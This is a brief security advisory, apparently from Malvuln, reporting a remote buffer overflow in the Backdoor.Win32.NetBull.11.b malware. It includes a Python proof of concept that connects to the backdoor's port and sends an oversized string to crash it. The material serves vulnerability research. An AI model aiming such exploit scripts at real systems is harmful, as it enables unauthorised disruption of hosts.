---

---

Backdoor.Win32.NetBull.11.b Remote Buffer Overflow

Backdoor.Win32.NetBull.11.b malware suffers from a remote buffer overflow vulnerability.

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=23456

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PACKOLA = "A"*666
    s.send(PACKOLA)
    s.close()

    print("Backdoor.Win32.NetBull.11.b / Remote Buffer Overflow");
    print("MD5: 0e0fc966862971c29edd4dcaa0ba8e86");
    print("By Malvuln");

if __name__=="__main__":
    doit()